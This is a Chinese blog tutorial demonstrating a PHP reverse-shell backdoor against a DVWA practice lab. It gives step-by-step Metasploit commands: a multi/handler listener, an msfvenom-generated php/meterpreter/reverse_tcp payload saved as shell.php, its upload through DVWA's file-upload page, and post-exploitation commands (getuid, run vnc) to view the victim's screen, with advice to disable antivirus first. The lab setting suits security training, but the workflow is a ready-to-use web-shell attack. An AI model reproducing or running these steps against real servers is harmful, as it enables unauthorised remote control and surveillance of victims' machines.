首页 > 编程语言 >PHP后门反弹演示

PHP后门反弹演示

时间:2023-01-14 15:01:44浏览次数:57  
标签:后门 php 演示 lhost 攻击机 PHP meterpreter 输入

准备

  1. 一台kali虚拟机
  2. 一台 win11物理机
  1. phpstudy 开启 Nginx和Mysql
  2. phpstudy中已经搭建好DVWA靶场
  3. DVWA靶场的安全等级调整值low

注意:

需要将杀毒软件个关了, 否则有提示, 黑客入侵.

开始

使用监控模块, 输入:

use exploit/multi/handler

配置payload

set payload php/meterpreter/reverse_tcp

# 接着输入
options

PHP后门反弹演示_php

设置 lhost 和lport

这里发现 攻击机的端口不用设置了, 已经有了, 只要设置lhost 就可以了

set lhost 攻击机的ip

PHP后门反弹演示_Nginx_02

生成php后门执行攻击获得meterpreter

注意:  要新建端口, 在root权限下执行

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip  lport=4444 R>shell.php

PHP后门反弹演示_php_03

PHP后门反弹演示_上传_04

这样在window11左面少就有这个文件了

上传文件

这是我原来的地址: http://dvwa/vulnerabilities/upload/#

这是我要填写的地址: http://dvwa/hackable/uploads/shell.php

出现上图几面说明:   这是正常的, 后门已经上传到了靶机上

获得权限

  1. 输入:

run 

# 也可以直接输入 exploit , 都一样

PHP后门反弹演示_php_05

也可能出现 404, 都是正常现象

只要有这两行, 就代表上传的后门生效了

PHP后门反弹演示_php_06

成功啦

  1. 获取管理员的名字, 输入:

getuid

  1. 观看屏幕 可以在meterpreter里输入

run vnc

点开文件即可看到自己电脑的画面

标签:后门,php,演示,lhost,攻击机,PHP,meterpreter,输入
From: https://blog.51cto.com/u_15936127/6007605

相关文章

  • 演示多个字符从两边移动,向中间汇聚
    #include<stdio.h>#include<string.h>#include<Windows.h>#include<stdlib.h>intmain(){chararr1[]="welcometoChina!!!";chararr2[]="################!!......
  • php 将二维数组处理成以某一列为key,某一列为value的一维数组
    $list=[0=>['id'=>1001,'name'=>'张三'],1=>['id'=>2091,'name'=>'李四']];array_combine(arr......
  • 使用vscode调试PHP底层C源码
    使用vscode调试PHP底层C源码一直想着有机会调试一下php底层代码来着,这周正好心血来潮,就跟着教程配置了一下。本篇文章是基于macOS,可能在编译php源码之前的步骤对使用windo......
  • 初识PHP(2):语法和变量创建
    PHP脚本文件在服务器上执行,然后将结果以HTML的形式发送回浏览器。PHP语法PHP文件通常会包含HTML代码和PHP代码;而PHP作为脚本代码,可以存在于文件任意的位置,只需要注明......
  • Demo演示:ARM+FPGA主流嵌入式架构板卡-HDMI显示摄像画面
    ​各位工程师小伙伴们,大家好,ARM+FPGA作为一种主流的嵌入式系统的处理架构。相对于单纯的的ARM开发或单纯的FPGA开发,ARM加FPGA能够带来功耗、性能、成本等组合优势。米尔新......
  • php 获取指定目录下面的某个随机文件名
    //获取指定目录下面的某个随机文件名functiongetRandomFileName($directory){$mydir=dir($directory);$files=array();while($file=$mydir->read()){......
  • 基于AD Event日志识别SID History后门
    01、简介每个用户都有一个关联的安全标识符(SID),SIDHistory的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户......
  • PHP常驻进程-内存暴涨
    常驻进程-RSA加密公钥私钥RESOURCE没有释放导致内存暴涨内存泄露往往是比较难查找的问题,借助bcc的memleak工具可以初步判断是哪个类库导致的,知道了哪个类型,可以大概判断是......
  • thinkphp伪静态设置
    .htaccess文件RewriteEngineOnRewriteCond%{REQUEST_FILENAME}!-d//-d如果目录存在就直接访问,不进行RewriteRuleRewriteCond%{REQUEST_FILENAME}!-f//-f......
  • php自动签发,生成双向验证证书
    效果:        代码:<?phpheader("Content-type:text/html;charset=utf-8");error_reporting(E_ALL);ini_set('display_errors',1);ini_set('memo......